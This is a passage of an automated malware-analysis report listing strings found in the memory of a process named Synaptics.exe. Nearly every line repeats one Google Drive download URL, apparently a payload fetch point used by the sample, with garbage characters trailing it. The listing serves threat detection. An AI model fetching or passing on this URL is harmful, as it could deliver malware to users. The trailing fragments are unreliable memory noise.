                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeM
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeclic
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadel
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem$v
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem%l
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenHw
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader=o
                                Source: Synaptics.exe, 00000003.00000003.1371121105.00000000054C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderse
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadersio
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloades
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadesan
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeuw
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                                Source: Synaptics.exe, 00000003.00000003.1328907159.000000000546F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf_
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgB
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgP
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadggph
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgooglV
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgp(
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs0
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhP
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi#
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadices-
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadid.co
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadimize
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadions:C
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadity
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyXx
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyYn
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyhu8
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyik8
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiz
                                Source: Synaptics.exe, 00000003.00000003.1371121105.00000000054C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadize-cn.com
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjS
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000729000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl$
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle-n
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme
                                Source: Synaptics.exe, 00000003.00000003.1371121105.00000000054C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlesandbox-cn.com
                                Source: Synaptics.exe, 00000003.00000003.1371121105.00000000054CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlifor
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadll
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.vnI&
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmdn-c
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme0x
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmp
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnM
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadner-P
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadni
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniLv
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniMl
                                Source: Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadny
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado/C
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado3C
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado?D
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoQ
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogleA%
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom4
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo8
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadooX
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogleD&
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...M
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadow
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado~
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp.gv
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpM
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpMa
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpeYR
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadphL
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadplat
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadps
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpu
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqQb
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.tx
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.un
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrP
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadriveU
